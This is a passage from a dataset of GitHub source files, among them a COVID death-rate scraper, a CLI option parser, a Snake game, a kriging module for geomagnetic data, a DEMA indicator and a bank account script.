to calulate the mortality rate of the corona virus for the USA and each state\r\n# The data is pulled from https://www.worldometers.info website\r\n\r\n\r\nimport time\r\nimport logging\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom coronavirus.ClassesFuncs import CalcRate\r\nfrom coronavirus.ClassesFuncs import setup_logging_Enhanced\r\nfrom coronavirus.ClassesFuncs import countdown\r\n\r\n\r\nurl_link = 'https://www.worldometers.info/coronavirus/country/us/'\r\noutputFile = 'States_TestResults.txt'\r\nfile_name = 'CoronaVirsCalc_States'\r\n\r\n\r\ndef Get_data_per_state(url_link):\r\n \"\"\"Parses the data from url_link, calculates death rate and output to state logs \"\"\"\r\n URL = url_link\r\n page = requests.get(URL)\r\n soup = BeautifulSoup(page.text, 'lxml')\r\n rows = soup.find(\r\n class_=\"table table-bordered table-hover table-responsive usa_table_countries\").find_all('tr')[1:]\r\n\r\n for row in rows:\r\n cell = [i.text for i in row.find_all('td')]\r\n states, totals, death = cell[0], cell[1], cell[3]\r\n mylist = list([states, totals, death])\r\n for idx, value in enumerate(mylist):\r\n value = value.replace(\"\\n\", \"\")\r\n value = value.replace(\",\", \"\")\r\n value = value.replace(\" \", \"\")\r\n if idx == 0:\r\n state = value\r\n elif idx == 1:\r\n num_cases = int(value)\r\n elif idx == 2:\r\n num_deaths = str(value)\r\n if num_deaths != '':\r\n num_deaths = int(value)\r\n else:\r\n num_deaths = None\r\n\r\n if num_deaths is not None:\r\n death_rate = CalcTheRate(num_cases, num_deaths)\r\n else:\r\n death_rate = None\r\n 
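# log this state's numbers to the shared file, then rebuild its per-state log\r\n            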
CreateFile(state, death_rate, num_cases, num_deaths)\r\n            OutPutToStateLog(state)\r\n\r\n\r\ndef CalcTheRate(num_cases, num_deaths):\r\n    \"\"\"Receives the case and death counts, calculates and returns the death rate. \"\"\"\r\n    rate_obj = CalcRate(num_cases, num_deaths)\r\n    death_rate_raw = (rate_obj.death())\r\n    death_rate = (format(death_rate_raw, '.2f'))\r\n    return death_rate\r\n\r\n\r\ndef CreateFile(state, death_rate, num_cases, num_deaths):\r\n    \"\"\"Receives 4 variables. Opens the main log file and writes the variables to each state log\"\"\"\r\n    TimeStamp = time.strftime(\"%m/%d/%Y_%H:%M:%S\")\r\n    with open(outputFile, 'a') as f:\r\n        f.write(\r\n            f\"\\n{TimeStamp}: {state}: Total cases: {num_cases}, Total deaths: {num_deaths}, Death rate: {death_rate}%\")\r\n    logging.info(\r\n        f\"{state}: Total cases: {num_cases}, Total deaths: {num_deaths}, Death rate: {death_rate}%\")\r\n\r\n\r\ndef OutPutToStateLog(state):\r\n    \"\"\"Opens and reads the main log file, States_TestResults.txt\r\n    Searches the main log file, retrieves the data for each state\r\n    and outputs the data to each state's log file \"\"\"\r\n    filename = 'States_TestResults.txt'\r\n    output_file = {state: 'c:\\\\Python38\\\\States\\\\logfile_' + state + '.txt'}\r\n\r\n    for string, logfile in output_file.items():\r\n        with open(filename) as outf:\r\n            datafile = outf.readlines()\r\n        string_found = [line for line in datafile if string in line]\r\n        with open(logfile, 'w') as inf:\r\n            for line in string_found:\r\n                inf.write(line)\r\n\r\n\r\ndef main():\r\n    setup_logging_Enhanced(file_name)\r\n    Get_data_per_state(url_link)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"pshapard/CoronaVirus","sub_path":"CoronaVirsCalc_States.py","file_name":"CoronaVirsCalc_States.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"11525129283","text":"#!/usr/bin/env python3\nimport sys\n\nclass SimpleOptionParser(object):\n    \"\"\"Parses command line args and options into dict and list\"\"\"\n    \n    def __init__(self):\n        self.option_value_dict = {}\n        self.arg_list = []\n        self.usage = \"\"\n\n        self.equivalent_option_dict = {}\n\n        self.no_parameter_option_list = []\n        self.single_parameter_option_list = []\n\n        self.TRUE = 'TRUE'\n\n    def put_no_parameter_option(self, no_parameter_option):\n        self.option_value_dict[no_parameter_option] = None\n        self.no_parameter_option_list.append(no_parameter_option)\n\n    def put_single_parameter_option(self, single_parameter_option):\n        \"\"\"Declare -f as an option with a single parameter, for example\"\"\"\n        self.option_value_dict[single_parameter_option] = None\n        self.single_parameter_option_list.append(single_parameter_option)\n\n    def store_equivalent_options(self, option, equivalent):\n        \"\"\"Make -f and --foobar be the same options, for example\"\"\"\n        # NOTE key: '--foobar' and value: '-f'. Note the reversed order\n        self.equivalent_option_dict[equivalent] = option\n    \n    def add_usage_line(self, line):\n        self.usage = self.usage + line + '\\n'\n\n    def parse(self, input_arg_list):\n        \"\"\"\n        Parses input_arg_list into option_value_dict, equivalent_option_dict\n\n        Returns:\n            True if parsing was successful. 
False if not\n \"\"\"\n if (len(input_arg_list) == 1):\n print(self.usage)\n\n return True\n\n iterator = iter(input_arg_list)\n next(iterator) # pass the command\n\n while True:\n try: \n arg = next(iterator)\n except StopIteration:\n break # break out of while\n else:\n # Prepare option from arg as the key for the option_value_dict\n option = None\n if arg.startswith('--'):\n option = self.equivalent_option_dict[arg]\n\n # if invalid option starting with --, let if-elses below\n # generate error\n if option is None:\n option = arg\n elif arg.startswith('-'):\n option = arg\n else:\n option = None\n\n # NOTE option has the key, and arg has the original user input \n if option != None:\n if option in self.no_parameter_option_list:\n if self.option_value_dict[option] != None:\n print(\"Error: duplicate entry for option %s\" % arg)\n\n return False\n\n self.option_value_dict[option] = self.TRUE\n elif option in self.single_parameter_option_list:\n try:\n value = next(iterator)\n except StopIteration:\n print(\"Error: option %s has no parameter.\" % arg)\n \n return False\n else: \n if value.startswith('-'):\n print(\"Error: option %s does not have \\\n corresponding parameter.\" % arg)\n\n return False\n \n if self.option_value_dict[option] != None:\n print(\"Error: duplicate entry for option %s\" % arg)\n\n return False\n\n # if all conditions are passed\n self.option_value_dict[option] = value\n else:\n print(\"Error: invalid option %s\" % arg) \n\n return False\n \n else: # if arg is not option\n self.arg_list.append(arg)\n\n # end of try - except - else\n\n if len(self.arg_list) == 0: \n print(\"Error: no arguments entered.\")\n\n return False\n\n return True\n \n\n\"\"\"Example Code\"\"\"\nif __name__=='__main__':\n p = SimpleOptionParser()\n\n \"\"\"Prepare for parsing\"\"\"\n p.add_usage_line(\"Usage: application [options] ... 
[files] ...\")\n    p.add_usage_line(\"\\t-t , --toggle No parameter option example\")\n    p.add_usage_line(\"\\t-f , --foobar [number] Single parameter option example\")\n\n    p.put_no_parameter_option('-t')\n    p.store_equivalent_options('-t', '--toggle')\n\n    p.put_single_parameter_option('-f')\n    p.store_equivalent_options('-f', '--foobar')\n\n    \"\"\"Parsing\"\"\"\n    p.parse(sys.argv)\n\n    \"\"\"Results\"\"\"\n    print()\n    print(\"# No parameter option list\")\n    print(p.no_parameter_option_list)\n    print(\"# Single parameter option list\")\n    print(p.single_parameter_option_list)\n\n    print()\n\n    print(\"# option_value_dict\")\n    print(p.option_value_dict)\n    print(\"# equivalent_option_dict\")\n    print(p.equivalent_option_dict)\n    print(\"# arg_list\")\n    print(p.arg_list)\n    print(\"# usage\")\n    print(p.usage)\n\n","repo_name":"jwsohn/SimpleOptionParser","sub_path":"python/src/simpleoptionparser.py","file_name":"simpleoptionparser.py","file_ext":"py","file_size_in_byte":5186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"38828166601","text":"import logging\nimport time\nfrom sys import stdout\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import OperationalError\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef wait_for_db(db_url):\n    \"\"\"checks if database connection is established\"\"\"\n\n    _local_engine = create_engine(db_url, echo=True)\n    _LocalSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=_local_engine)\n\n    up = False\n    while not up:\n        try:\n            # Try to create session to check if DB is awake\n\n            print('Waiting for database...')\n\n            db_session = _LocalSessionLocal()\n            db_session.execute(\"SELECT 1\")\n            db_session.commit()\n\n            print('DB Engine connected')\n\n        except OperationalError as err:\n            print(err)\n            logging.error(f\"Connection error: connection to server at {db_url} failed: Connection refused\")\n            logging.error('Waiting for reconnect...')\n            up = False\n        except Exception as err:\n            logging.error(f\"Connection error: {err}\")\n            up = False\n        else:\n            up = True\n            db_session.close()\n\n        time.sleep(5)\n","repo_name":"NwaforAugustine321/ktizo-backend","sub_path":"db/prestart.py","file_name":"prestart.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24201342659","text":"#\n# @lc app=leetcode.cn id=1 lang=python\n#\n# [1] Two Sum\n#\n\n# @lc code=start\nclass Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        hmap = {}\n        for i,num in enumerate(nums):\n            another_num = target-num\n            if another_num in hmap.keys():\n                return [hmap[another_num],i]\n            hmap[num] = i\n        return None\n# @lc code=end\n'''\nGiven an array of integers nums and a target value target, find the two integers in the array whose sum equals the target and return their array indices.\n\nYou may assume that each input has exactly one answer, but you may not use the same element of the array twice.\n\nExample:\n\n    Given nums = [2, 7, 11, 15], target = 9\n\n    because nums[0] + nums[1] = 2 + 7 = 9\n    return [0, 1]\n'''\n","repo_name":"eadasfa/LeetCode","sub_path":"1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"8347935405","text":"from abstra_server.runtimes.dashes.program import PythonProgram\nfrom abstra_server.api.classes import DashJSON, SlotJSON\nimport unittest\n\ndash_page_state = {\"widgets\": {\"widgetA\": {\"value\": None}, \"widgetB\": {\"value\": None}}}\n\n\ndef prepare_program(slot_dict: dict):\n    dash = 
DashJSON.from_dict(\n {\n \"path\": \"foo\",\n \"file\": \"\",\n \"layout\": {\n \"version\": \"0.2\",\n \"slot\": slot_dict,\n \"props\": {},\n },\n \"title\": \"foo\",\n }\n )\n program = PythonProgram(dash, \"print('hello world')\")\n program.root = SlotJSON(slot_dict)\n return program\n\n\nno_slots_layout = {\n \"widgetA\": {\n \"id\": \"widgetA\",\n \"type\": \"text-input\",\n \"props\": {\"label\": '\"label\"', \"placeholder\": '\"placeholder\"'},\n \"events\": {},\n \"colEnd\": 8,\n \"rowEnd\": 5,\n \"colStart\": 6,\n \"rowStart\": 3,\n \"variable\": None,\n }\n}\n\none_grid_layout = {\n \"gridBlock\": {\n \"id\": \"gridBlock\",\n \"type\": \"if-block\",\n \"row\": 1,\n \"height\": 5,\n \"order\": 0,\n \"props\": {\"condition\": \"True\"},\n \"slot\": {\n \"widgetA\": {\n \"type\": \"text-input\",\n \"props\": {\"label\": '\"label\"', \"placeholder\": '\"placeholder\"'},\n \"events\": {},\n \"rowStart\": 2,\n \"rowEnd\": 4,\n \"colStart\": 6,\n \"colEnd\": 8,\n \"id\": \"widgetA\",\n \"variable\": None,\n }\n },\n },\n}\n\n\nclass TestComputeWidgets(unittest.TestCase):\n def test_get_widget_simple_case(self):\n program = prepare_program(no_slots_layout)\n widget = program._PythonProgram__get_widget(\"widgetA\")\n self.assertEqual(widget.__dict__, no_slots_layout[\"widgetA\"])\n\n def test_get_widget_one_grid(self):\n program = prepare_program(one_grid_layout)\n widget = program._PythonProgram__get_widget(\"widgetA\")\n self.assertEqual(\n widget.__dict__, one_grid_layout[\"gridBlock\"][\"slot\"][\"widgetA\"]\n )\n","repo_name":"modaye/abstra-lib","sub_path":"tests/test_compute_widgets.py","file_name":"test_compute_widgets.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"9897496313","text":"import pymongo\nfrom pymongo.errors import AutoReconnect\nfrom pymongo.errors import NetworkTimeout\nfrom pymongo.errors import NotMasterError\nfrom Helper.JsonHandler import JsonHandler\nimport time\n\n'''DataBaseHandler connects to the mongoDB to fetch the replicas priority list'''\n\nclass DbHandler:\n\n def __init__(self):\n self._jsonHandler = JsonHandler()\n self._config = self._jsonHandler.LoadJson('Config.json')\n self._polling = True\n\n def GetStatusCollection(self):\n print(\"--->In Db Handler\")\n\n for attempts in range(self._config['dbReconnection']):\n try:\n Client = pymongo.MongoClient(self._config['connectionString'])\n dataBase = Client[self._config['dataBase']]\n collection = dataBase[self._config['collectionName']]\n self._polling = False\n return self._polling, collection\n except (AutoReconnect,NetworkTimeout) as ex:\n print(\"--->In Db Handler ex1\")\n print(str(ex))\n waitTime = 5.0*attempts\n self._polling = True\n time.sleep(waitTime)\n except Exception as ex:\n print(\"--->In Db Handler ex2\")\n print(str(ex))\n self._polling = True\n break\n return self._polling, None","repo_name":"amrishAK/DBB_gateway","sub_path":"Handler/DbHandler.py","file_name":"DbHandler.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29935279466","text":"#SNAKE BY NAGAARON#\r\n\r\n#FRAMEWORKS-------------------------------------------------------------------\r\n\r\nimport pygame\r\nimport random\r\n\r\n#CLASSES----------------------------------------------------------------------\r\n\r\n#Cube Class\r\nclass Cube(object):\r\n def __init__(self,x,y,color,dirnx=1,dirny=0,):\r\n self.pos = (x,y)\r\n 
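# note: the dirnx/dirny parameters are accepted but ignored; movement starts hardcoded to the right\r\n        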
self.dirnx = 1\r\n self.dirny = 0\r\n self.color = color\r\n self.r = 50\r\n def move(self,dirnx,dirny):\r\n self.dirnx = dirnx\r\n self.dirny = dirny\r\n self.pos =(self.pos[0]+self.dirnx*self.r, self.pos[1]+self.dirny*self.r)\r\n \r\n def draw(self,window):\r\n pygame.draw.rect(window,self.color,(self.pos[0],self.pos[1],self.r,self.r))\r\n \r\n#Snake Class\r\nclass Snake(object):\r\n \r\n body =[] \t # list of Cube Objects\r\n turns = {} # dictionary with tunrs\r\n \r\n def __init__(self,r):\r\n \r\n self.head = Cube(50,100,(255,0,0))\r\n self.body.append(self.head)\r\n self.dirnx = 0\r\n self.dirny = 0\r\n \r\n def move(self,window,s):\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_COMMA]:\r\n self.add_cube()\r\n \r\n if keys[pygame.K_SPACE]:\r\n self.reset()\r\n\r\n if keys[pygame.K_LEFT] and (self.dirnx != 1 and self.dirny != 0):\r\n self.dirnx = -1\r\n self.dirny = 0\r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n if keys[pygame.K_RIGHT] and (self.dirnx != -1 and self.dirny != 0):\r\n self.dirnx = 1\r\n self.dirny = 0\r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n if keys[pygame.K_UP] and (self.dirnx != 0 and self.dirny != 1):\r\n self.dirnx = 0\r\n self.dirny = -1\r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n if keys[pygame.K_DOWN] and (self.dirnx != 0 and self.dirny != 1):\r\n self.dirnx = 0\r\n self.dirny = 1 \r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n\r\n for j,i in enumerate(self.body):\r\n p = i.pos[:]\r\n if p in self.turns:\r\n turn = self.turns[p]\r\n i.move(turn[0],turn[1])\r\n if j==len(self.body)-1:\r\n self.turns.pop(p)\r\n else:\r\n if i.dirnx == -1 and i.pos[0] <= 0:\r\n i.pos = (s-i.r,i.pos[1])\r\n elif i.dirnx == 1 and i.pos[0] >= s-i.r:\r\n i.pos = (0,i.pos[1])\r\n elif i.dirny == 1 and i.pos[1] >= s-i.r:\r\n i.pos = (i.pos[0],0)\r\n elif i.dirny == -1 and i.pos[1] <= 0:\r\n i.pos = (i.pos[0],s-i.r)\r\n else:\r\n i.move(i.dirnx,i.dirny)\r\n i.draw(window)\r\n if j !=0:\r\n if i.pos == self.body[0].pos:\r\n self.reset()\r\n \r\n \r\n def add_cube(self):\r\n\r\n dx = self.body[-1].dirnx\r\n dy = self.body[-1].dirny\r\n if dx == 0 and dy == -1:\r\n self.body.append(Cube(self.body[-1].pos[0],self.body[-1].pos[1]+self.body[-1].r,(255,0,0)))\r\n if dx == 0 and dy == 1:\r\n self.body.append(Cube(self.body[-1].pos[0],self.body[-1].pos[1]-self.body[-1].r,(255,0,0)))\r\n if dx == 1 and dy == 0:\r\n self.body.append(Cube(self.body[-1].pos[0]-self.body[-1].r,self.body[-1].pos[1],(255,0,0)))\r\n if dx == -1 and dy == 0:\r\n self.body.append(Cube(self.body[-1].pos[0]+self.body[-1].r,self.body[-1].pos[1],(255,0,0))) \r\n self.body[-1].dirnx = dx\r\n self.body[-1].dirny = dy\r\n\r\n def reset(self): \r\n self.head = Cube(2*self.head.r,2*self.head.r,(255,0,0))\r\n self.body = [self.head]\r\n self.turns ={}\r\n self.dirnx = 1\r\n self.dirny = 0\r\n \r\n#FUNCTIONS--------------------------------------------------------------------\r\n\r\ndef neues_essen(window,schlange):\r\n global essen\r\n if schlange.body[0].pos == essen.pos:\r\n schlange.add_cube()\r\n newx = essen.r*round(random.randint(0,450)/essen.r)\r\n newy = essen.r*round(random.randint(0,450)/essen.r)\r\n essen = Cube(newx,newy,(0,0,255))\r\n\r\n\r\n \r\ndef draw_grid(window,s,r):\r\n for x in range(0,s,r):\r\n pygame.draw.line(window,(255,255,255),(x,0),(x,s))\r\n pygame.draw.line(window,(255,255,255),(0,x),(s,x))\r\n\r\ndef draw_window(window,s,r,schlange,essen):\r\n window.fill((0,0,0))\r\n schlange.move(window, s)\r\n 
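# draw the food cube after the snake so it stays visible on top\r\n    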
essen.draw(window)\r\n draw_grid(window,s,r)\r\n pygame.display.update()\r\n \r\ndef main_loop():\r\n global essen\r\n screen_width = 500\r\n row_width = 50\r\n game_on = True\r\n clock = pygame.time.Clock()\r\n window = pygame.display.set_mode((screen_width,screen_width))\r\n pygame.display.set_caption(\"Snake\")\r\n essen = Cube(row_width*round(random.randint(0,450)/row_width),row_width*round(random.randint(0,450)/row_width),(0,0,255))\r\n schlange = Snake(row_width)\r\n while game_on:\r\n clock.tick(10)\r\n e_in_s = True\r\n draw_window(window,screen_width,row_width,schlange,essen)\r\n neues_essen(window,schlange)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\nmain_loop() \r\n","repo_name":"nagaaron/Snake","sub_path":"snake_nagaaron.py","file_name":"snake_nagaaron.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28822351145","text":"import pandas as pd\nimport numpy as np\nimport logging\nimport json\nimport pykrige.kriging_tools as kt\nfrom pykrige.ok import OrdinaryKriging\nfrom .filepaths import full_dataset_filepath, holed_dataset_filepath\nfrom .canadas_coordinates import *\nfrom .dataset_columns import *\nfrom backend_implementation.holed_data import HoledData\nfrom backend_implementation.full_data import FullData\n\nclass Kriging():\n\n\tdef __init__(self, index, data):\n\t\tself.moving_avg_size = 2\n\t\tself.sites_output_df = None\n\t\tself.data_moving_avg = self.calculate_moving_average(data)\n\t\tself.kriging_output = self.perform_kriging(index, data)\n\t\tself.kriging_output_json = self.structure_output_as_json(self.kriging_output)\n\n\tdef calculate_moving_average(self, data):\n\t\t# After experiementing with different sizes, it was found that using a moving average over every 2 samples \n\t\t# led to the best performing kriging model. 
Moving average: https://en.wikipedia.org/wiki/Moving_average\n\t\treturn data.df.rolling(self.moving_avg_size).mean()\n\n\tdef perform_kriging(self, index, data):\n\t\tcurrent_date = str(data.dataset_df['DD-HH'][index]);\n\n\t\t# Since we are using a rolling average, the average of the first moving_avg_size - 1 rows will be NaN.\n\t\t# Hence, we use the first non-NaN row from the dataset to determine the magnetic field.\n\t\tif index < (self.moving_avg_size - 1):\n\t\t\tindex = self.moving_avg_size - 1\n\n\t\t# Perform Ordinary Kriging: https://pykrige.readthedocs.io/en/latest/overview.html#ordinary-kriging-example\n\t\tOK = OrdinaryKriging(data.longitudes, data.latitudes, data.df.loc[index], variogram_model='spherical', \n\t\t\tverbose=False, enable_plotting=False, coordinates_type='geographic')\n\t\tz1, ss1 = OK.execute('grid', data.longitude_grid, data.latitude_grid)\n\n\t\t# These values are the indinces (long,lat) which correspond to the magnetic field reading at the site MEA\n\t\tindex_of_mea_longitude = np.where(data.longitude_grid == mea_longitude)[0][0]\n\t\tindex_of_mea_latitude = np.where(data.latitude_grid == mea_latitude)[0][0]\n\n\t\t# z1 is a masked array of size len(latitude_grid) x len(longitude_grid) containing the interpolated values.\n\t\t# Hence, we access the value at MEA's coordinates as z1[lat][long] instead of z1[long][lat].\n\t\tpredicted_value = round(z1.data[index_of_mea_latitude][index_of_mea_longitude], 2)\n\n\t\tif isinstance(data, FullData):\n\t\t\tself.sites_output_df = self.build_sites_output_dataframe(index, data, full_dataset_site_names, predicted_value)\n\t\t\ttarget_value = data.target.loc[index]['MEA']\n\t\telse:\n\t\t\tself.sites_output_df = self.build_sites_output_dataframe(index, data, holed_dataset_site_names, predicted_value)\n\t\t\ttarget_value = r'N/A'\n\n\t\t# Return z1.data, sites_output_df, predicted value and target_value as a dictionary. This information will\n\t\t# be passed onto the user's browser, where is will be used to visualise the data on maps.\n\t\treturn_values = {}\n\t\treturn_values['prediction_grid'] = z1.data\n\t\treturn_values['sites_output_df'] = self.sites_output_df\n\t\treturn_values['predicted_value'] = predicted_value\n\t\treturn_values['target_value'] = target_value\n\t\treturn_values['current_date'] = current_date\n\t\treturn return_values\n\n\n\tdef build_sites_output_dataframe(self, index, data, sites, predicted_value):\n\t\tsites_df = pd.DataFrame(columns=['site_name', 'magnetic_field_variation', 'longitude', 'latitude'])\n\n\t\t# Create a dataframe containing information about each site and it's magnetic field variation value\n\t\t# on the given DD-HH. 
This information will be visualised on a map in the browser window.\n\t\tfor site in sites:\n\t\t\tname = site\n\t\t\tvalue = data.dataset_df[site][index]\n\t\t\tlongitude = data.dataset_df[site + \"_lon\"][index]\n\t\t\tlatitude = data.dataset_df[site + \"_lat\"][index]\n\t\t\tsites_df = sites_df.append(pd.Series([name, value, longitude, latitude], index=sites_df.columns), ignore_index=True)\n\n\t\t# Explicitly add a row for the MEA site as the column has been removed/is unavailable in the datasets\n\t\tname = target_columns[0] # MEA\n\t\tvalue = predicted_value\n\t\tlongitude = mea_longitude\n\t\tlatitude = mea_latitude\n\t\tsites_df = sites_df.append(pd.Series([name, value, longitude, latitude], index=sites_df.columns), ignore_index=True)\n\t\treturn sites_df\n\n\tdef structure_output_as_json(self, kriging_output):\n\t\tjson_response_obj = {}\n\n\t\t# dict object containing magnetic field variation values of the MEA site\n\t\ttarget_site_dict = {\n\t\tr'site': target_columns[0], \n\t\tr'predicted_value': kriging_output['predicted_value'], \n\t\tr'target_value': kriging_output['target_value']\n\t\t}\n\n\t\t# dict object containing information about all sites\n\t\tsites_data = []\n\t\tsites_df = kriging_output['sites_output_df']\n\t\tfor index, row in sites_df.iterrows():\n\t\t\tsite = {}\n\t\t\tsite[r'name'] = row['site_name']\n\t\t\tsite[r'value'] = row['magnetic_field_variation']\n\t\t\tsite[r'lon'] = row['longitude']\n\t\t\tsite[r'lat'] = row['latitude']\n\t\t\tsites_data.append(site)\n\t\t\n\n\t\t# dict containing information about all coordinates from the grid spanning across Canada\n\t\tgrid = kriging_output['prediction_grid']\n\t\tlatitude = southern_most_latitude\n\t\tlongitude = western_most_longitude\n\t\tacross_canada_data = []\n\t\tfor row in grid:\n\t\t\tfor value in row:\n\t\t\t\tlocation_dict = {}\n\t\t\t\tlocation_dict[r'lon'] = longitude\n\t\t\t\tlocation_dict[r'lat'] = latitude\n\t\t\t\tlocation_dict[r'value'] = round(value, 2)\n\t\t\t\tacross_canada_data.append(location_dict)\n\t\t\t\tlongitude = longitude + 0.5\n\t\t\tlongitude = western_most_longitude\n\t\t\tlatitude = latitude + 0.5\n\n\t\t# dict containing the dimensions of the sites_output_df.\n\t\t# This is used to determine the boundaries of polygons in the heat map.\n\t\tgrid_dimensions = {'rows': kriging_output['prediction_grid'].shape[0], 'columns': kriging_output['prediction_grid'].shape[1]}\n\t\t\n\t\t# Generate a dict consisting of the above 3 JSON objects and return it to the browser.\n\t\tjson_response_obj['current_date'] = kriging_output['current_date']\n\t\tjson_response_obj[r'target_site'] = target_site_dict\n\t\tjson_response_obj[r'sites_data'] = sites_data\n\t\tjson_response_obj[r'across_canada_data'] = across_canada_data\n\t\tjson_response_obj[r'grid_dimensions'] = grid_dimensions\n\n\t\t# Don't do a json.dumps() here because it leads to escape characters being inserted when the \n\t\t# objects is unpacked as a JSON object in Jinja2 template using the 'tojson' method. 
Hence,\n\t\t# pass it to the browser as a mapping (i.e dict obj) and unpack it as a JSON directly.\n\t\treturn json_response_obj\n","repo_name":"Joshua-Swain/mapping-canadian-geomagnetic-activity","sub_path":"code/mainapp/backend_implementation/kriging.py","file_name":"kriging.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7553188361","text":"from main import HOME\n\nimport gtk\nimport gobject\n\n\n\n#\n# Class for a list of items.\n#\nclass ListView(gtk.TreeView):\n\n    def __init__(self, columntypes, renderer):\n\n        self.__items = {}\n        self.__renderer = renderer\n\n\n        gtk.TreeView.__init__(self)\n        self.__liststore = gtk.ListStore(*columntypes)\n\n        self.set_model(self.__liststore)\n        self.set_headers_visible(False)\n\n        cnt = 0\n        for ctype in columntypes:\n            if (ctype == gtk.gdk.Pixbuf):\n                col = gtk.TreeViewColumn(None, gtk.CellRendererPixbuf(),\n                                         pixbuf = cnt)\n            elif (ctype == gobject.TYPE_STRING):\n                col = gtk.TreeViewColumn(None, gtk.CellRendererText(),\n                                         markup = cnt)\n            \n            self.append_column(col)\n            cnt += 1\n        #end for\n        \n\n\n\n    #\n    # Clears the list.\n    #\n    def clear(self):\n\n        self.__items = {}\n        self.__liststore.clear()\n        self.set_size_request(-1, -1)\n        import gc; gc.collect()\n\n\n    #\n    # Returns the selected item or None.\n    #\n    def get_selected_item(self):\n\n        path = self.get_cursor()[0]\n        return self.__items.get(path)\n\n\n    #\n    # Selects the given item.\n    #\n    def select_item(self, item):\n\n        for path, i in self.__items.items():\n            if (item == i):\n                self.set_cursor(path, None, False)\n                break\n        #end for\n\n\n\n    #\n    # Adds as item to the list.\n    #\n    def add_item(self, item):\n\n        values = self.__renderer(item)\n\n        iter = self.__liststore.append()\n        for i in range(len(values)):\n            self.__liststore.set(iter, i, values[i])\n\n        path = self.__liststore.get_path(iter)\n        self.__items[path] = item\n","repo_name":"RaumZeit/gdesklets-core","sub_path":"shell/ListView.py","file_name":"ListView.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"38190776481","text":"import numpy as np\nimport pandas as pd\n\n\nclass Dema:\n\n    def __init__(self, historical_data, time_period=200, column=\"close\"):\n\n        self.historical_data = historical_data\n        self.time_period = time_period\n        self.column = column\n\n    def prev(self):\n\n        ema = self.historical_data[self.column].ewm(\n            span=self.time_period, adjust=False).mean()\n\n        dema = 2 * ema - \\\n            ema.ewm(span=self.time_period, adjust=False).mean()\n\n        return dema\n\n    def next(self, realtime_data):\n\n        split_data = self.historical_data.tail(self.time_period - 1)\n        split_data = pd.concat([split_data, realtime_data])\n\n        ema = split_data[self.column].ewm(\n            span=self.time_period, adjust=False).mean()\n\n        dema = 2 * ema - \\\n            ema.ewm(span=self.time_period, adjust=False).mean()\n\n        return dema\n","repo_name":"PhoenixGamesComp/TradingBotV3","sub_path":"indicators/dema.py","file_name":"dema.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20866859009","text":"class Bank:\n    def __init__(self,name,accNo,accType,bal):\n        self.name=name\n        self.accNo=accNo\n        self.accType=accType\n        self.bal=bal\n\n    def deposit(self,depAmt):\n        self.depAmt=self.bal+depAmt\n        print(\"Amount deposited: \",depAmt)\n        self.bal=self.bal+depAmt\n        print(\"Total available balance=\",self.bal)\n    \n    def withdraw(self,withAmt):\n        self.withAmt=self.bal-withAmt\n        print(\"Amount withdrawn: \",withAmt)\n        self.bal=self.bal-withAmt\n        print(\"Total available balance=\",self.bal)\n    \n\n    def showBal(self):\n        print(\"Total available balance=\",self.bal)\n\n    \nbal=0\nchoice=0\naccNum=input(\"Enter the name:\")\naccNo=int(input(\"Enter your account number:\"))\naccType=input(\"Enter your account type:\")\ncust1=Bank(accNum,accNo,accType,bal)\nwhile(choice!=4):\n    choice=int(input(\"Enter your choice: \\n1. Deposit\\n2.Withdraw\\n3.Check Balance\\n4.Exit\"))\n\n    if(choice==1):\n        depAmt=int(input(\"Enter how much amount you want to deposit\\n\"))\n        cust1.deposit(depAmt)\n    elif(choice==2):\n        withAmt=int(input(\"Enter how much amount you want to withdraw\\n\"))\n        cust1.withdraw(withAmt)\n    elif(choice==3):\n        cust1.showBal()\n\n\n\n    \n","repo_name":"shiva2230/PythonLab","sub_path":"CO4/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
